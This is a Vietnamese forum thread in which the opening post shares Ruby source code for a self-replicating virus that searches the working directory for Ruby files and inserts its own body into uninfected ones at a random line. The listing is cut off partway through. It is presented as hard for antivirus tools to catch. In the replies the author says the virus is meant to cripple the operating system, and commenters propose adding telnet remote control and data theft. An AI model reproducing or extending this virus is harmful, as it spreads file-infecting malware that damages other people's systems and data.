30/09/2018, 20:09

Code virus đơn giản bằng Ruby - P2

Như topic trước: Code Virus đơn giản bằng Ruby Em đã chia sẻ đến mọi người dạng virus loại đa hình dạng cơ bản. Còn hôm nay, nhân vừa thức hết buổi trưa vọc , xin chia sẻ tiếp tới những ae cùng nghiên cứu AV (Antivirus nhé! ). Dạng virus siêu đa hình được nâng cấp mạnh mẽ hơn và cũng ranh hơn, nên rất khó để bị bắt nhờ khả năng tự thay đổi địa chỉ + giả dạng tập tin đã được mã hóa + mở file ngẫu nhiên nhằm đánh lừa AV

# SPTH
mycode = ""
mych = File.open(__FILE__)
myc = mych.read(1)
while myc != nil
mycode += myc
myc = mych.read(1)
end
i = 0
while myc != "SPTH"
myc = mycode[i, 4]
i += 1
end
mycode = "# S" + mycode[i, 1382]
cdir = Dir.open(Dir.getwd)
cdir.each do |a |
    if File.ftype(a) == "file"
then
if a[a.length - 3, a.length] == ".rb"
then
if a != File.basename(__FILE__) then
fcode = ""
fle = open(a)
spth = fle.read(1)
while spth != nil
fcode += spth
spth = fle.read(1)
end
fle.close
i = 0
inf = 0
lc = 0
while i < fcode.length
i = i + 1
if fcode[i, 4] == "SPTH"
then
inf = 1
end
if fcode[i, 1] == 10. chr then
lc += 1
end
end
if inf != 1 then
ln = rand(lc)
precode = ""
i = 0
j = 0
while i < ln
precode += fcode[j, 1]
j += 1
if fcode[j, 1] == 10. chr then
i += 1
end
end
newcode = precode + 13. chr + 10. chr + mycode + 13. chr + 10. chr
while j <= fcode.length
newcode += fcode[j, 1]
j += 1
end
Nguyễn Anh Khoa viết 22:24 ngày 30/09/2018

@conan4582 @htwap @superthin @DepTraiNhatVinhBacBo @nguyenhuuca @TheSky

Nguyễn Anh Khoa viết 22:25 ngày 30/09/2018

Khi virus kích hoạt là mình đã chiếm được quyền rồi mà anh Phát triển thêm cho nó connect được với ip của mình qua telnet để chỉ huy nó

Ngô Doãn Tuấn viết 22:18 ngày 30/09/2018

Không rành phần này lắm, nên không biết đóng góp thế nào ta?
Virut này mục đích là gì ? Liệu có cần nền tảng gì để chạy nó không tazzz?
Nhưng ngủ trưaquan trọng lắm nhé.
Nên dành 15-30 Phút để ngủ trưa.
Đảm bảo thể trạng và sức khỏe cho buổi chiều và tối

Nguyễn Anh Khoa viết 22:16 ngày 30/09/2018

Lời khuyên hữu ích quá, em mất ngủ cả tuần rồi Chán quá ngồi dạy vọc code

Nguyễn Anh Khoa viết 22:12 ngày 30/09/2018

Virus này nhằm mục đích phá hủy hệ thống và làm tê liệt hoạt động của hđh Nếu được biên dịch ra file thực thi nó sẽ tự được set quyền admintrator và chạy đa nền tảng anh ạ

Ngô Doãn Tuấn viết 22:11 ngày 30/09/2018


Ghét ai thì cho vào máy nó phải không nhỉ ?
Rồi chạy
Thay vì làm cái phá hủy thế này. Sao em không tạo ra virus có thể lấy cắp thông tin nhỉ

Nguyễn Anh Khoa viết 22:10 ngày 30/09/2018

Anh Sky dùng biểu tượng này chắc có mục đích mờ ám chăng

Nguyễn Anh Khoa viết 22:24 ngày 30/09/2018

Virus này có thể cài đặt lệnh telnet để điều khiển từ xa nên ăn cắp thì cũng là một trong số đó Nhưng học hỏi để nghiên cứu thôi chứ anh

Ngô Doãn Tuấn viết 22:17 ngày 30/09/2018

Dùng gì để điều khiển từ xa nếu không có quyền truy cập nhỉ?
Học hỏi phải đi kèm với thực hành chứ

Lâm Gia Khang viết 22:21 ngày 30/09/2018

Muốn học về mã độc này thì bắt đầu từ đâu nhỉ?em thấy ở Đại học đâu có dạy.Còn tự học thì kiếm tài liệu sao khó quá

Bài liên quan
0